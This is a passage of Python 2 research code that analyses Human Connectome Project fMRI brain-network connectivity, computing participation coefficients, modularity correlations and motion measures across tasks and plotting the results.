plot_corr_matrix(np.nanmean(pc_corr_matrix,axis=0)[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_mean_pc_corr_matrix.pdf'%(homedir,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
plot_corr_matrix(np.nanmean(m[predict_nodes,:,:],axis=0)[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_%s_mean_mediation_matrix_withbar.pdf'%(homedir,driver,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
# plot_corr_matrix(np.nanmean(pc_corr_matrix,axis=0)[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file=None,reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
f = sns.plt.figure(figsize=(18,6))
sns.set_style("white")
sns.set_style("ticks")
sns.set(context="paper",font='Helvetica',font_scale=1.2)
sns.violinplot(data=locality_df[locality_df['Node Type']=='Connector Hub'],x='Task',y='t',hue='Task',inner='quartile',palette=sns.palettes.color_palette('Paired',7))
sns.plt.ylabel("T Test Values, mediation values of node's nieghbors \n versus mediation of node's non-neighbors")
sns.plt.legend(bbox_to_anchor=[1,1.05],ncol=7,columnspacing=10)
sns.plt.savefig('%s/dynamic_mod/figures/%s_mediation_t_test.pdf'%(homedir,run_version))
sns.plt.show()
# plot_corr_matrix(mean_conn[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file=None,reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
def network_labels(atlas):
if atlas == 'gordon':
name_dict = {}
df = pd.read_excel('%sdynamic_mod/Parcels.xlsx'%(homedir))
df.Community[df.Community=='None'] = 'Uncertain'
for i,com in enumerate(np.unique(df.Community.values)):
name_dict[com] = i
known_membership = np.zeros((333))
for i in range(333):
known_membership[i] = name_dict[df.Community[i]]
network_names = np.array(df.Community.values).astype(str)
if atlas == 'power':
known_membership = np.array(pd.read_csv('%smodularity/Consensus264.csv'%(homedir),header=None)[31].values)
known_membership[known_membership==-1] = 0
network_names = np.array(pd.read_csv('%smodularity/Consensus264.csv'%(homedir),header=None)[36].values)
name_int_dict = {}
for name,int_value in zip(network_names,known_membership):
name_int_dict[int_value] = name
return known_membership,network_names,len(known_membership),name_int_dict
def split_connectivity_across_tasks(n_iters=10000):
global hcp_subjects
try:
df = pd.read_csv('/home/despoB/mb3152/dynamic_mod/results/split_corrs.csv')
except:
split = True
tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST']
project='hcp'
atlas = 'power'
known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
df_columns=['Task','Pearson R, PC, PC & Q','Pearson R, WCD, WCD & Q']
df = pd.DataFrame(columns = df_columns)
for task in tasks:
print task
subjects = np.array(hcp_subjects).copy()
subjects = list(subjects)
subjects = remove_missing_subjects(subjects,task,atlas)
assert (subjects == np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_fz.npy'%(task,atlas))).all()
static_results = graph_metrics(subjects,task,atlas)
subject_pcs = static_results['subject_pcs']
subject_mods = static_results['subject_mods']
subject_wmds = static_results['subject_wmds']
matrices = static_results['matrices']
task_perf = task_performance(subjects,task)
assert subject_pcs.shape[0] == len(subjects)
wmd_rs = []
pc_rs = []
from sklearn.cross_validation import ShuffleSplit
for pc_subs,pc_mod_subjects in ShuffleSplit(n=len(subjects),n_iter=n_iters,train_size=.5,test_size=.5):
mod_pc_corr = np.zeros(subject_pcs.shape[1])
mod_wmd_corr = np.zeros(subject_pcs.shape[1])
mean_pc = np.nanmean(subject_pcs[pc_subs,],axis=0)
mean_wmd = np.nanmean(subject_wmds[pc_subs,],axis=0)
for i in range(subject_pcs.shape[1]):
mod_pc_corr[i] = nan_pearsonr(subject_mods[pc_mod_subjects],subject_pcs[pc_mod_subjects,i])[0]
mod_wmd_corr[i] = nan_pearsonr(subject_mods[pc_mod_subjects],subject_wmds[pc_mod_subjects,i])[0]
df = df.append({'Task':task,'Pearson R, PC, PC & Q':nan_pearsonr(mod_pc_corr,mean_pc)[0],'Pearson R, WCD, WCD & Q':nan_pearsonr(mod_wmd_corr,mean_wmd)[0]},ignore_index=True)
print np.mean(df['Pearson R, PC, PC & Q'][df.Task==task])
print np.mean(df['Pearson R, WCD, WCD & Q'][df.Task==task])
df.to_csv('/home/despoB/mb3152/dynamic_mod/results/split_corrs.csv')
sns.plt.figure(figsize=(20,10))
sns.violinplot(data=df,y='Pearson R, PC, PC & Q',x='Task',inner='quartile')
sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/split_pc.pdf',dpi=3600)
sns.plt.close()
sns.violinplot(data=df,y='Pearson R, WCD, WCD & Q',x='Task',inner='quartile')
sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/split_wcd.pdf',dpi=3600)
sns.plt.close()
def run_fd(subject,task):
try:
MP = np.load('/home/despoB/mb3152/dynamic_mod/motion_files/%s_%s.npy' %(subject,task))
except:
outfile = '/home/despoB/mb3152/dynamic_mod/motion_files/%s_%s.npy' %(subject,task)
MP = np.loadtxt('/home/despoB/connectome-raw/%s/MNINonLinear/Results/%s/Movement_Regressors.txt'%(subject,task))
FD = brain_graphs.compute_FD(MP[:,:6])
FD = np.append(0,FD)
np.save(outfile,FD)
MP = np.load('/home/despoB/mb3152/dynamic_mod/motion_files/%s_%s.npy' %(subject,task))
return MP
def get_sub_motion(subject,task):
motion_files = glob.glob('/home/despoB/mb3152/dynamic_mod/motion_files/%s_*%s*' %(subject,task))
if len(motion_files) == 0:
smo = np.nan
if len(motion_files) > 0:
smo = []
for m in motion_files:
smo.append(np.nanmean(np.load(m)))
smo = np.nanmean(smo)
return smo
def hcp_motion(subject,task):
motion_files = glob.glob('/home/despoB/connectome-raw/%s/MNINonLinear/Results/*%s*/Movement_RelativeRMS_mean.txt'%(subject,task))
smo = []
for m in motion_files:
smo.append(np.nanmean(np.loadtxt(m)))
smo = np.nanmean(smo)
return smo
def compare_motion_params(subjects,task):
my_ver = []
hcp_ver = []
for s in hcp_subjects:
my_ver.append(get_sub_motion(s,''))
hcp_ver.append(hcp_motion(s,''))
def all_motion(tasks,atlas='power'):
everything = ['tfMRI_WM_RL','tfMRI_WM_LR','rfMRI_REST1_LR','rfMRI_REST2_LR','rfMRI_REST1_RL','rfMRI_REST2_RL','tfMRI_RELATIONAL_LR','tfMRI_RELATIONAL_RL','tfMRI_SOCIAL_RL','tfMRI_SOCIAL_LR','tfMRI_LANGUAGE_LR','tfMRI_LANGUAGE_RL','tfMRI_GAMBLING_RL','tfMRI_MOTOR_RL','tfMRI_GAMBLING_LR','tfMRI_MOTOR_LR']
for task in everything:
print task
if 'REST' in task:
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',task.split('_')[1][:4],atlas))
else:
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',task.split('_')[1],atlas))
for subject in subjects:
try:
run_fd(subject,task)
except:
print subject,task
def individual_differnce_networks(task,atlas='power',run_version='fz'):
known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
network_order = ['Auditory','Sensory/somatomotor Hand','Sensory/somatomotor Mouth','Visual','Dorsal attention','Ventral attention',
'Cingulo-opercular Task Control','Salience','Fronto-parietal Task Control','Default mode','Cerebellar','Subcortical','Memory retrieval?','Uncertain']
colors = np.array(pd.read_csv('%smodularity/Consensus264.csv'%(homedir),header=None)[34].values)
colors[colors=='Pale blue'] = '#ADD8E6'
colors[colors=='Teal'] = '#008080'
swap_indices = []
for nn in network_order:
original_idx = np.where(network_names == nn)
for i in range(len(original_idx[0])):
swap_indices.append(original_idx[0][i])
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_%s.npy' %('hcp',task,atlas,run_version))
static_results = graph_metrics(subjects,task,atlas,run_version=run_version)
matrices = static_results['matrices']
diff_matrix = np.zeros((264,264))
for i,j in combinations(range(264),2):
r = np.nanmean(np.diagonal(generate_correlation_map(matrices[:,i,:].swapaxes(0,1), matrices[:,j,:].swapaxes(0,1))))
diff_matrix[i,j] = r
diff_matrix[j,i] = r
plot_corr_matrix(matrix=diff_matrix[:,swap_indices][swap_indices],membership=network_names[swap_indices].copy(),out_file=None,reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
plot_corr_matrix(matrix=np.nanmean(matrices,axis=0)[:,swap_indices][swap_indices],membership=network_names[swap_indices].copy(),out_file=None,reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
plot_corr_matrix(matrix=diff_matrix-np.nanmean(matrices,axis=0)[:,swap_indices][swap_indices],membership=network_names[swap_indices].copy(),out_file=None,reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
for network in np.unique(network_names):
print network, np.mean((diff_matrix-np.nanmean(matrices,axis=0))[network_names==network][:,network_names!=network])
for network in np.unique(network_names):
print network, scipy.stats.ttest_ind((diff_matrix-np.nanmean(matrices,axis=0))[network_names==network][:,network_names!=network].reshape(-1),(diff_matrix-np.nanmean(matrices,axis=0))[network_names==network][:,network_names==network].reshape(-1))
def make_mean_matrix():
atlas = 'power'
for task in ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST']:
print task
matrix = []
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_power_subs_fz.npy' %('hcp',task))
for subject in subjects:
files = glob.glob('%sdynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%(homedir,atlas,subject,atlas,task))
for f in files:
f = np.load(f)
assert np.nanmax(f) <= 1.
np.fill_diagonal(f,0.0)
mmax = np.nanmax(abs(np.tril(f,-1) - np.triu(f,1).transpose()))
if mmax != 0.0: print subject
assert np.isclose(mmax,0)
f = np.arctanh(f)
matrix.append(f.copy())
matrix = np.nanmean(matrix,axis=0)
print np.min(np.max(matrix,axis=1))
assert (matrix == np.load('/home/despoB/mb3152/diverse_club/graphs/%s.npy'%(task))).all() == True
# np.save('/home/despoB/mb3152/diverse_club/graphs/%s.npy'%(task),matrix)
def connectivity_across_tasks(atlas='power',project='hcp',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz_wc',control_com=False,control_motion=False):
import matlab
import matlab.engine
eng = matlab.engine.start_matlab()
eng.addpath('/home/despoB/mb3152/BrainNet/')
atlas='power'
project='hcp'
tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST']
run_version='fz_wc'
control_com=False
control_motion=False
pc_df = pd.DataFrame(columns=['Task','Mean Participation Coefficient','Diversity Facilitated Modularity Coefficient'])
wmd_df = pd.DataFrame(columns=['Task','Mean Within-Community-Strength','Locality Facilitated Modularity Coefficient'])
for task in tasks:
print task
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_%s.npy' %('hcp',task,atlas,run_version))
static_results = graph_metrics(subjects,task,atlas,run_version=run_version)
subject_pcs = static_results['subject_pcs']
subject_mods = static_results['subject_mods']
subject_wmds = static_results['subject_wmds']
subject_communities = static_results['subject_communities']
matrices = static_results['matrices']
subjects = static_results['subjects']
if control_motion == True:
subject_motion = []
for subject in subjects:
subject_motion.append(get_sub_motion(subject,task))
assert (np.isnan(subject_motion)==True).any() == False
assert np.min(subject_motion) > 0.
mean_pc = np.nanmean(static_results['subject_pcs'],axis=0)
mean_wmd = np.nanmean(static_results['subject_wmds'],axis=0)
mod_pc_corr = np.zeros(subject_pcs.shape[1])
mod_wmd_corr = np.zeros(subject_pcs.shape[1])
if control_com == True and control_motion == True:
model_vars = np.array([subject_motion,subject_communities]).transpose()
r_mod = sm.GLM(subject_mods,sm.add_constant(model_vars)).fit()
assert np.isclose(0.0,pearsonr(r_mod.resid_response,subject_motion)[0]) == True
assert np.isclose(0.0,pearsonr(r_mod.resid_response,subject_communities)[0]) == True
c_str = 'Motion and Number of Communities'
subject_mods = r_mod.resid_response
if control_com == True and control_motion == False:
r_mod = sm.GLM(subject_mods,sm.add_constant(subject_communities)).fit()
assert np.isclose(0.0,pearsonr(r_mod.resid_response,subject_communities)[0]) == True
c_str = 'Number of Communities'
subject_mods = r_mod.resid_response
if control_com == False and control_motion == True:
r_mod = sm.GLM(subject_mods,sm.add_constant(subject_motion)).fit()
assert np.isclose(0.0,pearsonr(r_mod.resid_response,subject_motion)[0]) == True
c_str = 'Motion'
subject_mods = r_mod.resid_response
for i in range(subject_pcs.shape[1]):
mod_pc_corr[i] = nan_pearsonr(subject_pcs[:,i],subject_mods)[0]
for i in range(subject_pcs.shape[1]):
mod_wmd_corr[i] = nan_pearsonr(subject_wmds[:,i],subject_mods)[0]
task_str = np.zeros((len(mean_pc))).astype(str)
task_str[:] = task
pc_df = pc_df.append(pd.DataFrame(np.array([task_str,mean_pc,mod_pc_corr]).transpose(),columns=['Task','Mean Participation Coefficient','Diversity Facilitated Modularity Coefficient']),ignore_index=True)
wmd_df = wmd_df.append(pd.DataFrame(np.array([task_str,mean_wmd,mod_wmd_corr]).transpose(),columns=['Task','Mean Within-Community-Strength','Locality Facilitated Modularity Coefficient']),ignore_index=True)
continue
import matlab
# pc values
write_df = pd.read_csv('/home/despoB/mb3152/BrainNet/Data/ExampleFiles/Power264/Node_Power264.node',header=None,sep='\t')
pcs = np.nanmean(subject_pcs,axis=0)
write_df[3] = pcs
write_df = write_df[write_df[3]>np.percentile(write_df[3].values,80)]
write_df.to_csv('/home/despoB/mb3152/dynamic_mod/brain_figures/power_pc_%s.node'%(task),sep='\t',index=False,names=False,header=False)
node_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/power_pc_%s.node'%(task)
surf_file = '/home/despoB/mb3152/BrainNet/Data/SurfTemplate/BrainMesh_ICBM152_smoothed.nv'
img_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/pc_%s.png' %(task)
configs = '/home/despoB/mb3152/BrainNet/pc_values_thresh.mat'
eng.BrainNet_MapCfg(node_file,surf_file,configs,img_file)
#mod pc values
write_df = pd.read_csv('/home/despoB/mb3152/BrainNet/Data/ExampleFiles/Power264/Node_Power264.node',header=None,sep='\t')
write_df[3] = mod_pc_corr
write_df = write_df[write_df[3]>np.percentile(write_df[3].values,80)]
write_df.to_csv('/home/despoB/mb3152/dynamic_mod/brain_figures/power_pc_mod_%s.node'%(task),sep='\t',index=False,names=False,header=False)
node_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/power_pc_mod_%s.node'%(task)
surf_file = '/home/despoB/mb3152/BrainNet/Data/SurfTemplate/BrainMesh_ICBM152_smoothed.nv'
img_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/mod_pc_corr_%s.png' %(task)
configs = '/home/despoB/mb3152/BrainNet/pc_values_thresh.mat'
eng.BrainNet_MapCfg(node_file,surf_file,configs,img_file)
# wcd values
write_df = pd.read_csv('/home/despoB/mb3152/BrainNet/Data/ExampleFiles/Power264/Node_Power264.node',header=None,sep='\t')
wmds = np.nanmean(subject_wmds,axis=0)
write_df[3] = wmds
write_df = write_df[write_df[3]>np.percentile(write_df[3].values,80)]
write_df.to_csv('/home/despoB/mb3152/dynamic_mod/brain_figures/power_wmds_%s.node'%(task),sep='\t',index=False,names=False,header=False)
node_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/power_wmds_%s.node'%(task)
surf_file = '/home/despoB/mb3152/BrainNet/Data/SurfTemplate/BrainMesh_ICBM152_smoothed.nv'
img_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/wmds_%s.png' %(task)
configs = '/home/despoB/mb3152/BrainNet/pc_values_thresh.mat'
eng.BrainNet_MapCfg(node_file,surf_file,configs,img_file)
#mod wcd values
write_df = pd.read_csv('/home/despoB/mb3152/BrainNet/Data/ExampleFiles/Power264/Node_Power264.node',header=None,sep='\t')
write_df[3] = mod_wmd_corr
write_df = write_df[write_df[3]>np.percentile(write_df[3].values,80)]
write_df.to_csv('/home/despoB/mb3152/dynamic_mod/brain_figures/power_wmd_mod_%s.node'%(task),sep='\t',index=False,names=False,header=False)
node_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/power_wmd_mod_%s.node'%(task)
surf_file = '/home/despoB/mb3152/BrainNet/Data/SurfTemplate/BrainMesh_ICBM152_smoothed.nv'
img_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/mod_wmd_corr_%s.png' %(task)
configs = '/home/despoB/mb3152/BrainNet/pc_values_thresh.mat'
eng.BrainNet_MapCfg(node_file,surf_file,configs,img_file)
return pc_df,wmd_df
def matrix_of_changes():
"""
Make a matrix of each node's PC correlation to all edges in the graph.
"""
drivers = ['PC','WCD']
tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST']
project='hcp'
atlas = 'power'
known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
for driver in drivers:
all_matrices = []
violin_df = pd.DataFrame()
for task in tasks:
# subjects = np.array(hcp_subjects).copy()
# subjects = list(subjects)
# subjects = remove_missing_subjects(subjects,task,atlas)
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',task,atlas))
assert (subjects == np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_fz.npy'%(task,atlas))).all()
static_results = graph_metrics(subjects,task,atlas)
subject_pcs = static_results['subject_pcs']
subject_mods = static_results['subject_mods']
subject_wmds = static_results['subject_wmds']
matrices = static_results['matrices']
task_perf = task_performance(subjects,task)
assert subject_pcs.shape[0] == len(subjects)
mean_pc = np.nanmean(subject_pcs,axis=0)
mean_wmd = np.nanmean(subject_wmds,axis=0)
mod_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(subject_pcs.shape[1]):
mod_pc_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
mod_wmd_corr = np.zeros(subject_wmds.shape[1])
for i in range(subject_wmds.shape[1]):
mod_wmd_corr[i] = nan_pearsonr(subject_mods,subject_wmds[:,i])[0]
if driver == 'PC':
predict_nodes = np.where(mod_pc_corr>0.0)[0]
local_predict_nodes = np.where(mod_pc_corr<0.0)[0]
pc_edge_corr = np.arctanh(pc_edge_correlation(subject_pcs,matrices,path='/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_pc_edge_corr_z.npy' %(project,task,atlas)))
else:
predict_nodes = np.where(mod_wmd_corr>0.0)[0]
local_predict_nodes = np.where(mod_wmd_corr<0.0)[0]
pc_edge_corr = np.arctanh(pc_edge_correlation(subject_wmds,matrices,path='/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_wmd_edge_corr_z.npy' %(project,task,atlas)))
# Plot matrix of changes
edge_thresh = 75
edge_thresh = np.percentile(np.nanmean(matrices,axis=0),edge_thresh)
pc_edge_corr[:,np.nanmean(matrices,axis=0)<edge_thresh,] = np.nan
high_pc_edge_matrix = np.nanmean(pc_edge_corr[predict_nodes],axis=0)
low_pc_edge_matrix = np.nanmean(pc_edge_corr[local_predict_nodes],axis=0)
matrix = (np.tril(low_pc_edge_matrix) + np.triu(high_pc_edge_matrix)).reshape((264,264))
plot_matrix = matrix.copy()
plot_matrix_mask = np.isnan(plot_matrix)
zscores = scipy.stats.zscore(plot_matrix[plot_matrix_mask==False].reshape(-1))
plot_matrix[plot_matrix_mask==False] = zscores
if task != 'REST':
all_matrices.append(plot_matrix)
plot_corr_matrix(plot_matrix,network_names.copy(),out_file='/home/despoB/mb3152/dynamic_mod/figures/%s_corr_matrix_%s.pdf'%(driver,task),plot_corr=False,return_array=False)
pc_edge_corr[np.isnan(pc_edge_corr)] = 0.0
connector_within_network_mask = pc_edge_corr.copy().astype(bool)
local_within_network_mask = pc_edge_corr.copy().astype(bool)
connector_between_network_mask = pc_edge_corr.copy().astype(bool)
local_between_network_mask = pc_edge_corr.copy().astype(bool)
connector_within_network_mask[:,:,:] = False
local_within_network_mask[:,:,:] = False
connector_between_network_mask[:,:,:] = False
local_between_network_mask[:,:,:] = False
for n in predict_nodes:
for node1,node2 in combinations(range(264),2):
if n == node1:
continue
if n == node2:
continue
if known_membership[node1] == 0:
continue
if known_membership[node2] == 0:
continue
if known_membership[node1] == known_membership[node2]:
connector_within_network_mask[n][node1,node2] = True
connector_within_network_mask[n][node2,node1] = True
else:
connector_between_network_mask[n][node1,node2] = True
connector_between_network_mask[n][node2,node1] = True
for n in local_predict_nodes:
for node1,node2 in combinations(range(264),2):
if n == node1:
continue
if n == node2:
continue
if known_membership[node1] == 0:
continue
if known_membership[node2] == 0:
continue
if known_membership[node1] == known_membership[node2]:
local_within_network_mask[n][node1,node2] = True
local_within_network_mask[n][node2,node1] = True
else:
local_between_network_mask[n][node1,node2] = True
local_between_network_mask[n][node2,node1] = True
def make_strs_for_df(array_to_add,str_to_add):
array_len = len(array_to_add)
str_array_ = np.chararray(array_len,itemsize=40)
str_array_[:] = str_to_add
return str_array_
def make_array_for_df(arrays_to_add):
append_array = np.zeros((len(arrays_to_add[0]),len(arrays_to_add))).astype(str)
append_array[:,0] = arrays_to_add[0]
append_array[:,1] = arrays_to_add[1]
append_array[:,2] = arrays_to_add[2]
return append_array
violin_columns = ["r value, node i's PCs and j's edge weights","Node Type","Edge Type"]
task_violin_df = pd.DataFrame(columns=violin_columns)
result_array_to_add = pc_edge_corr[connector_within_network_mask].reshape(-1)[pc_edge_corr[connector_within_network_mask].reshape(-1)!=0.0]
edge_type_ = make_strs_for_df(result_array_to_add,'Within Community')
node_type_ = make_strs_for_df(result_array_to_add,'Q+')
df_array_to_add = make_array_for_df([result_array_to_add,node_type_,edge_type_])
task_violin_df = task_violin_df.append(pd.DataFrame(data=df_array_to_add,columns=violin_columns),ignore_index=True)
result_array_to_add = pc_edge_corr[local_within_network_mask].reshape(-1)[pc_edge_corr[local_within_network_mask].reshape(-1)!=0.0]
edge_type_ = make_strs_for_df(result_array_to_add,'Within Community')
node_type_ = make_strs_for_df(result_array_to_add,'Q-')
df_array_to_add = make_array_for_df([result_array_to_add,node_type_,edge_type_])
task_violin_df = task_violin_df.append(pd.DataFrame(data=df_array_to_add,columns=violin_columns),ignore_index=True)
result_array_to_add = pc_edge_corr[connector_between_network_mask].reshape(-1)[pc_edge_corr[connector_between_network_mask].reshape(-1)!=0.0]
edge_type_ = make_strs_for_df(result_array_to_add,'Between Community')
node_type_ = make_strs_for_df(result_array_to_add,'Q+')
df_array_to_add = make_array_for_df([result_array_to_add,node_type_,edge_type_])
task_violin_df = task_violin_df.append(pd.DataFrame(data=df_array_to_add,columns=violin_columns),ignore_index=True)
result_array_to_add = pc_edge_corr[local_between_network_mask].reshape(-1)[pc_edge_corr[local_between_network_mask].reshape(-1)!=0.0]
edge_type_ = make_strs_for_df(result_array_to_add,'Between Community')
node_type_ = make_strs_for_df(result_array_to_add,'Q-')
df_array_to_add = make_array_for_df([result_array_to_add,node_type_,edge_type_])
task_violin_df = task_violin_df.append(pd.DataFrame(data=df_array_to_add,columns=violin_columns),ignore_index=True)
task_violin_df["r value, node i's PCs and j's edge weights"] = task_violin_df["r value, node i's PCs and j's edge weights"].astype(float)
if driver == 'PC':
print task + ', Connector Hubs(Q+): ' + str(scipy.stats.ttest_ind(task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q+'][task_violin_df['Edge Type']=='Within Community'],
task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q+'][task_violin_df['Edge Type']=='Between Community']))
print task + ', Non-Connector Hubs(Q-): ' + str(scipy.stats.ttest_ind(task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q-'][task_violin_df['Edge Type']=='Within Community'],
task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q-'][task_violin_df['Edge Type']=='Between Community']))
else:
print task + ', Local Hubs(Q+): ' + str(scipy.stats.ttest_ind(task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q+'][task_violin_df['Edge Type']=='Within Community'],
task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q+'][task_violin_df['Edge Type']=='Between Community']))
print task + ', Non Local Hubs (Q-): ' + str(scipy.stats.ttest_ind(task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q-'][task_violin_df['Edge Type']=='Within Community'],
task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q-'][task_violin_df['Edge Type']=='Between Community']))
#append for average of all
violin_df = violin_df.append(pd.DataFrame(data=task_violin_df,columns=violin_columns),ignore_index=True)
#Figure for single Task
sns.set_style("white")
sns.set_style("ticks")
colors = sns.color_palette(['#fdfd96','#C4D8E2'])
with sns.plotting_context("paper",font_scale=2):
plt.figure(figsize=(24,16))
sns.boxplot(x="Node Type", y="r value, node i's PCs and j's edge weights", hue="Edge Type", order=['Q+','Q-'], data=task_violin_df)
plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/%s_edge_mod_%s.pdf'%(driver,task),dpi=4600)
plt.close()
# Average of All
plot_corr_matrix(np.nanmean(all_matrices,axis=0),network_names.copy(),out_file='/home/despoB/mb3152/dynamic_mod/figures/%s_corr_matrix_avg.pdf'%(driver),plot_corr=False,return_array=False)
if driver == 'PC':
print task + ',Connector Hubs(Q+): ' + str(scipy.stats.ttest_ind(violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q+'][violin_df['Edge Type']=='Within Community'],
violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q+'][violin_df['Edge Type']=='Between Community']))
print task + ', Non-Connector Hubs(Q-): ' + str(scipy.stats.ttest_ind(violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q-'][violin_df['Edge Type']=='Within Community'],
violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q-'][violin_df['Edge Type']=='Between Community']))
else:
print task + ', Local Hubs(Q+): ' + str(scipy.stats.ttest_ind(violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q+'][violin_df['Edge Type']=='Within Community'],
violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q+'][violin_df['Edge Type']=='Between Community']))
print task + ', Non-Local Hubs(Q-): ' + str(scipy.stats.ttest_ind(violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q-'][violin_df['Edge Type']=='Within Community'],
violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q-'][violin_df['Edge Type']=='Between Community']))
sns.set_style("white")
sns.set_style("ticks")
colors = sns.color_palette(['#fdfd96','#C4D8E2'])
with sns.plotting_context("paper",font_scale=3):
plt.figure(figsize=(24,16))
sns.boxplot(x="Node Type", y="r value, node i's PCs and j's edge weights",hue="Edge Type", palette=colors,order=['Q+','Q-'], data=violin_df)
plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/%s_edge_mod_avg.pdf'%(driver),dpi=4600)
plt.close()
def individual_pc_q():
atlas = 'power'
project='hcp'
known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
task = 'REST'
print task
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',task,atlas))
static_results = graph_metrics(subjects,task,atlas)
matrices = static_results['matrices']
subject_pcs = static_results['subject_pcs']
subject_mods = static_results['subject_mods']
mod_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(subject_pcs.shape[1]):
mod_pc_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
threshes = [0.1,.2,0.25,.3]
threshes = [.1]
mean_pc = np.nanmean(subject_pcs,axis=0)
for thresh in threshes:
df = pd.DataFrame()
for i in range(len(subject_pcs)):
for pi,p in enumerate(subject_pcs[i]):
if mod_pc_corr[pi] < thresh:
continue
df = df.append({'node':pi,'Q':subject_mods[i],'PC':p},ignore_index=True)
# df = df.append({'node':pi,'Performance':task_perf[i],'PC':p},ignore_index=True)
sns.lmplot('PC','Q',df,hue='node',order=2,truncate=True,scatter=False,scatter_kws={'label':'Order:1','color':'y'})
sns.plt.xlim([0,.75])
sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/pc_mod_regress_%s_2.pdf'%(thresh))
sns.plt.close()
sns.lmplot('PC','Q',df,hue='node',order=3,truncate=True,scatter=False,scatter_kws={'label':'Order:1','color':'y'})
sns.plt.xlim([0,.75])
sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/pc_mod_regress_%s_3.pdf'%(thresh))
sns.plt.close()
sns.lmplot('PC','Q',df,hue='node',lowess=True,truncate=True,scatter=False,scatter_kws={'label':'Order:1','color':'y'})
sns.plt.xlim([0,.75])
sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/pc_mod_regress_%s_lowless.pdf'%(thresh))
sns.plt.close()
sns.lmplot('PC','Q',df,order=2,truncate=True,scatter=False,scatter_kws={'label':'Order:1','color':'y'})
sns.plt.xlim([0,.75])
sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/pc_mod_regress_mean_%s_2.pdf'%(thresh))
sns.plt.close()
sns.lmplot('PC','Q',df,order=3,truncate=True,scatter=False,scatter_kws={'label':'Order:1','color':'y'})
sns.plt.xlim([0,.75])
sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/pc_mod_regress_mean_%s_3.pdf'%(thresh))
sns.plt.close()
sns.lmplot('PC','Q',df,lowess=True,truncate=True,scatter=False,scatter_kws={'label':'Order:1','color':'y'})
sns.plt.xlim([0,.75])
